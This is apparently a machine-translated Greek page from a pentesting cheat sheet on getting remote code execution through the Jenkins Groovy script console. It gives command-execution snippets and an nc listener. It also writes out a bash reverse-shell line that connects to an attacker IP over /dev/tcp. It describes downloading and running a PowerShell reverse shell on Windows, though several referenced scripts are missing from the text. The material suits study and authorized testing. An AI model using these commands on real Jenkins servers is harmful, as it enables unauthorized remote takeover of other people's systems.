Jenkins RCE with Groovy Script
Jenkins RCE με Groovy Script
Αυτό είναι λιγότερο θορυβώδες από το να δημιουργήσετε ένα νέο έργο στο Jenkins
Μεταβείτε στο path_jenkins/script
Εντός του πλαισίου κειμένου εισαγάγετε το script
Μπορείτε να εκτελέσετε μια εντολή χρησιμοποιώντας: cmd.exe /c dir
Στο linux μπορείτε να κάνετε: "ls /".execute().text
Εάν χρειάζεστε να χρησιμοποιήσετε εισαγωγικά και μονά εισαγωγικά μέσα στο κείμενο. Μπορείτε να χρησιμοποιήσετε """PAYLOAD""" (τριπλά διπλά εισαγωγικά) για να εκτελέσετε το φορτίο.
Ένα άλλο χρήσιμο groovy script είναι (αντικαταστήστε [ΕΙΣΑΓΩΓΗ ΕΝΤΟΛΗΣ]):
Αντίστροφη κέλυφος σε Linux
Για να εκτελέσετε ένα αντίστροφο κέλυφος σε ένα σύστημα Linux, μπορείτε να χρησιμοποιήσετε την ακόλουθη μέθοδο:
Δημιουργήστε έναν ακροατήριο σε έναν εξωτερικό διακομιστή. Μπορείτε να χρησιμοποιήσετε την εντολή
nc -lvp <port>
για να δημιουργήσετε τον ακροατήριο σε ένα συγκεκριμένο θύρα.Δημιουργήστε ένα αντίστροφο κέλυφος χρησιμοποιώντας την εντολή
bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1
. Αντικαταστήστε την<attacker_ip>
με την διεύθυνση IP του εξωτερικού διακομιστή και την<port>
με την θύρα που έχετε ορίσει για τον ακροατήριο.Εκτελέστε την εντολή κέλυφους στον εξωτερικό διακομιστή για να αρχίσει η ακρόαση στη συγκεκριμένη θύρα.
Όταν ο στόχος εκτελέσει την εντολή αντίστροφου κελύφους, θα συνδεθεί αυτόματα με τον εξωτερικό διακομιστή και θα έχετε πρόσβαση στο σύστημα του.
Αυτή η τεχνική σας επιτρέπει να αποκτήσετε αντίστροφο κέλυφος σε ένα σύστημα Linux και να αποκτήσετε πλήρη έλεγχο επί του συστήματος από απόσταση. Είναι σημαντικό να σημειωθεί ότι η χρήση αυτής της τεχνικής χωρίς την έγκριση του νόμιμου κατόχου του συστήματος αποτελεί παράνομη δραστηριότητα.
Αντίστροφη κέλυφος σε Windows
Μπορείτε να προετοιμάσετε έναν HTTP διακομιστή με ένα αντίστροφο κέλυφος PS και να χρησιμοποιήσετε το Jeking για να το κατεβάσετε και να το εκτελέσετε:
Σενάριο
Μπορείτε να αυτοματοποιήσετε αυτήν τη διαδικασία με αυτό το σενάριο.
Μπορείτε να χρησιμοποιήσετε το MSF για να λάβετε ένα αντίστροφο κέλυφος:
Last updated